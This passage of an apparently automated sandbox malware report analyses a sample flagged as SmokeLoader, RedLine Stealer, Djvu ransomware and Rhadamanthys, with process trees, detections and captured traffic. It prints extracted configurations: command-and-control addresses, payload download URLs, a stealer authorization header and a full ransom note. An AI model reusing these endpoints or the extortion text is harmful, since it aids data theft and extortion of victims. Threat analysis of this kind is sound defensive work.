Jan 25, 2023 09:28:27.594902039 CET	192.168.2.4	8.8.8.8	0xa725	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:28:29.245378017 CET	192.168.2.4	8.8.8.8	0x149b	Standard query (0)	gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 25, 2023 09:28:11.545039892 CET	8.8.8.8	192.168.2.4	0xe307	No error (0)	potunulit.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:28:11.545039892 CET	8.8.8.8	192.168.2.4	0xe307	No error (0)	potunulit.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:28:27.617297888 CET	8.8.8.8	192.168.2.4	0xa725	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:28:29.266858101 CET	8.8.8.8	192.168.2.4	0x149b	Name error (3)	gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.2ip.ua

ryjphgb.com

potunulit.org

egqgnqk.org

aygtqn.org

fedface.com

pghirnwb.com

hkrpyqspb.net

jwoitvech.com

fedbh.net

fyugji.net

mlleyedksk.org

vjawtynvst.net

fyeyf.org

Target ID:	0
Start time:	09:27:06
Start date:	25/01/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	344064 bytes
MD5 hash:	6DEF34B7D9603C4FC7953F177F73C21A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Analysis Process: explorer.exePID: 3528, Parent PID: 1032

General

Target ID:	3
Start time:	09:27:39
Start date:	25/01/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff618f60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: C676.exePID: 4620, Parent PID: 3528

General

Target ID:	6
Start time:	09:28:11
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\C676.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C676.exe
Imagebase:	0x400000
File size:	417792 bytes
MD5 hash:	261B1DB94CCF4266128E2EB71A80FDA4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Analysis Process: beiruttPID: 2236, Parent PID: 1088

General

Target ID:	7
Start time:	09:28:11
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Roaming\beirutt
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\beirutt
Imagebase:	0x400000
File size:	344064 bytes
MD5 hash:	6DEF34B7D9603C4FC7953F177F73C21A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: 43D0.exePID: 1332, Parent PID: 3528

General

Target ID:	8
Start time:	09:28:19
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\43D0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\43D0.exe
Imagebase:	0x400000
File size:	718848 bytes
MD5 hash:	0A006808F7AA017CAF2DF9CE9E2B55A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs
Reputation:	moderate

Analysis Process: C4AA.exePID: 4116, Parent PID: 3528

General

Target ID:	9
Start time:	09:28:22
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\C4AA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C4AA.exe
Imagebase:	0x860000
File size:	1642648 bytes
MD5 hash:	EA25CE2F3580AF1DD771BAC5B0D2BF83
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 43%, ReversingLabs
Reputation:	moderate

Analysis Process: 43D0.exePID: 3900, Parent PID: 1332

General

Target ID:	10
Start time:	09:28:25
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\43D0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\43D0.exe
Imagebase:	0x400000
File size:	718848 bytes
MD5 hash:	0A006808F7AA017CAF2DF9CE9E2B55A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate

Analysis Process: ngentask.exePID: 400, Parent PID: 4116

General

Target ID:	11
Start time:	09:28:31
Start date:	25/01/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Imagebase:	0x360000
File size:	85096 bytes
MD5 hash:	ED7F195F7121781CC3D380942765B57D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: ngentask.exePID: 4292, Parent PID: 4116

General

Target ID:	12
Start time:	09:28:32
Start date:	25/01/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Imagebase:	0xfa0000
File size:	85096 bytes
MD5 hash:	ED7F195F7121781CC3D380942765B57D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: fontview.exePID: 4772, Parent PID: 4116

General

Target ID:	13
Start time:	09:28:34
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\fontview.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SYSWOW64\fontview.exe
Imagebase:	0xdb0000
File size:	114176 bytes
MD5 hash:	218D53564FB0DD0CAFBBF871641E70F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Disassembly

⊘No disassembly

Source: http://potunulit.org:80/N	Avira URL Cloud: Label: malware
Source: http://potunulit.org/J2v-m	Avira URL Cloud: Label: malware
Source: http://drampik.com/lancer/get.php	Avira URL Cloud: Label: malware
Source: http://potunulit.org/s	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Temp\43D0.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\4434343.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\C676.exe	ReversingLabs: Detection: 80%

Source: C:\Users\user\AppData\Roaming\beirutt	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4434343.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Joe Sandbox ML: detected

Source: Malware configuration extractor	URLs: http://drampik.com/lancer/get.php
Source: Malware configuration extractor	URLs: 89.208.103.88:37538
Source: Malware configuration extractor	URLs: http://bulimu55t.net/
Source: Malware configuration extractor	URLs: http://soryytlic4.net/
Source: Malware configuration extractor	URLs: http://bukubuka1.net/
Source: Malware configuration extractor	URLs: http://novanosa5org.org/
Source: Malware configuration extractor	URLs: http://hujukui3.net/
Source: Malware configuration extractor	URLs: http://newzelannd66.org/
Source: Malware configuration extractor	URLs: http://golilopaster.org/

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ryjphgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://egqgnqk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aygtqn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fedface.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pghirnwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hkrpyqspb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jwoitvech.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fedbh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fyugji.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mlleyedksk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vjawtynvst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fyeyf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: potunulit.org

Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://drampik.com/files/1/build3.exe"], "C2 url": "http://drampik.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-cud8EGMtyB\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0637JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Wi
Source: 9.3.C4AA.exe.df30000.1.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["89.208.103.88:37538"], "Bot Id": "birj proliv", "Authorization Header": "9941068ef2768ed5ba54fc3eed22d795"}

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fih9XRZVfiHb6ul5lDe89E96SyIR%2B8f8Z05%2BaTBePa9Sxmz3Wr50lxG68ZyAwNwaaVf5qg7yvvxrt56vC4ZRnB%2BVkX4C8ZLJHmFe47CsFxNy%2FMwhQCasP1k3e6S1nuQU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa24c791e9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 0d 0a 03 00 00 00 1f 3d 53 0d 0a Data Ascii: 7=S
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EDSp5MowyujsafEdpguYy7bJLZ51FtpeE2S33L5xlU0bVdcA5%2FWFoCLEbpKtJiVcQ0MWs5QhCB%2FyebFjp4q%2Bup9lZsvFb0GjshaOPbMzOB1E%2F88CeRtfq9FSMzkt60gE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa24d6ab59b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 96 a5 d1 a6 8f 3a c7 cf 23 6a 3c 03 ff f9 e0 c0 64 6b 52 e1 32 c7 0d c9 f7 df c9 42 d2 09 e6 00 c6 04 25 76 13 21 82 77 a3 10 10 0f 50 0b 84 cd 01 1c 6d 4c 66 58 e8 1b 3d eb 35 ee de 80 0e 70 06 30 12 95 c5 c8 98 66 73 fd 10 68 f5 6b cc e3 bf 6c 13 d9 1e 1c 8d 79 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 54 53 51 3a 05 fc 1d 09 52 2b e5 8d 83 7b 9e 45 f5 fe 73 8c 5c db c4 ff 13 13 bf 92 e4 92 24 08 4f c5 7c e7 cb a1 61 6e de f5 69 a9 18 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a 04 38 7c 88 2c c8 48 69 70 c6 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 bf 78 f5 1a 0c 9b 4a d8 19 8e c8 4f 13 f6 80 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 c5 08 31 e5 98 90 f7 0f e4 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac 47 c6 d9 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 ee e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 27 af a1 90 4e b1 54 55 a5 7c b7 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 7c fc 04 f1 2c 4e af 03 5b 51 1d e4 a6 8b 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 d1 fe f3 94 0a 15 d7 ec 8a c3 e0 2b 59 b7 bb 01 7e 17 28 d2 04 45 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c e7 47 9c 3c 21 c4 3a 96 9e c9 e7 17 3f dc e1 7e 4d a2 70 d4 03 45 af 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e7 23 de ab b6 5f 29 43 43 5f 56 03 62 18 2a 19 f8 40 ae ae 88 c1 76 a2 33 25 7d da a9 c3 e8 c8 2f Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG*:#j<dkR2B%v!wPmLfX=5p0fshkly3Ob>!Z:V?sBTSQ:R+{Es\$O\|ani~_TzN,%Qa8\|,HipJ
